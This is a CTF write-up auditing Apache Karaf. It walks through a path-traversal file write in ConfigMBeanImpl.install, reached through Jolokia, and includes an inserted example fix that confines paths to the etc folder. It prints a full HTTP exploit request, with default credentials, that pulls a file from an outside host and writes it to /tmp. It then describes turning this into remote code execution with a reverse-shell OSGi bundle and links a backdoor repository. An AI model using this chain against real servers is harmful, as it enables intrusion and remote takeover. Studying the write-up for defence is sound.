
tctf ghost pepper writeup and a simple code audit of the karaf framework

While doing tctf, I assumed that RR was going to drop a 0day, so I went off to audit the karaf source code and never read the karaf documentation properly...

In org.apache.karaf.config.core.impl.ConfigMBeanImpl there is a directory-traversal file-write vulnerability:

```java
@Override
public void install(String url, String finalname, boolean override) throws MBeanException {
    try {
        File etcFolder = new File(System.getProperty("karaf.etc"));
        // finalname is joined to the etc folder without any check for ".." segments
        File file = new File(etcFolder, finalname);
        if (file.exists()) {
            if (!override) {
                throw new IllegalArgumentException("Configuration file {} already exists " + finalname);
            }
        }

        // the content is fetched from a caller-supplied URL and written to the resolved path
        try (InputStream is = new BufferedInputStream(new URL(url).openStream())) {
            if (!file.exists()) {
                File parentFile = file.getParentFile();
                if (parentFile != null) {
                    parentFile.mkdirs();
                }
                file.createNewFile();
            }
            try (FileOutputStream fop = new FileOutputStream(file)) {
                StreamUtils.copy(is, fop);
            }
        } catch (RuntimeException | MalformedURLException e) {
            throw e;
        }
    } catch (Exception e) {
        throw new MBeanException(null, e.toString());
    }
}
```

As you can see, `..` segments in `finalname` let the write escape the etc folder into any directory. To reproduce the challenge environment, we install karaf and then install the jolokia bundle:
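The missing check is path confinement: `new File(etcFolder, finalname)` simply concatenates, so `..` segments (or an absolute `finalname`) resolve outside `karaf.etc`. The following is an added example of how such a check can be written, not Karaf's own fix; the `/opt/karaf/etc` base path and the class name `ConfinedPathCheck` are assumptions for illustration.

```java
import java.io.File;
import java.nio.file.Path;

public class ConfinedPathCheck {

    // Resolve finalname against etcFolder and reject any result that is not
    // inside etcFolder. Path.normalize() collapses "." and ".." segments, and
    // Path.startsWith() compares whole path components, so "/opt/karaf/etc2"
    // does not pass as a child of "/opt/karaf/etc" the way a string prefix
    // comparison would allow.
    static File resolveInsideEtc(File etcFolder, String finalname) {
        Path base = etcFolder.toPath().toAbsolutePath().normalize();
        // resolve() returns finalname unchanged when it is absolute, which the
        // startsWith() check below also rejects.
        Path target = base.resolve(finalname).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException(
                "Configuration file name escapes the etc folder: " + finalname);
        }
        return target.toFile();
    }

    public static void main(String[] args) {
        File etc = new File("/opt/karaf/etc"); // assumed karaf.etc location

        // a plain file name stays inside etc and is accepted
        System.out.println(resolveInsideEtc(etc, "my.cfg"));

        // the traversal string from the request above is rejected
        String[] bad = {
            "../../../../../../../tmp/testfile",
            "sub/../../escape.cfg",
            "/tmp/absolute.cfg"
        };
        for (String name : bad) {
            try {
                resolveInsideEtc(etc, name);
                System.out.println("accepted (unexpected): " + name);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

One caveat: `normalize()` works on the lexical path only and does not follow symbolic links, so a symlink already present under the etc folder could still point elsewhere; where the target exists, `toRealPath()` on both the base and the target before the `startsWith()` check closes that gap.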

[screenshot]

Then we only need to send a request like this:

```http
POST /jolokia HTTP/1.1
Host: 111.186.63.207:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json
Content-Length: 179
Authorization: Basic a2FyYWY6a2FyYWY=
Connection: close
Upgrade-Insecure-Requests: 1

{ "type":"EXEC", "mbean":"org.apache.karaf:name=root,type=config", "operation": "install", "arguments":["http://69.171.76.88/testfile","../../../../../../../tmp/testfile",true]}
```

[screenshot]

As you can see, the file has been written into the /tmp directory.

[screenshot]

To turn this into RCE: karaf automatically loads bundles dropped into the deploy directory and calls the start function of their Activator, so we only need to build a malicious OSGi bundle whose start function launches a reverse shell.

[screenshot]

The source of the bundle used here is at https://github.com/imagemlt/osgi-bundle-backdoor; run mvn install and then mvn package, and the generated jar can be found in the target directory.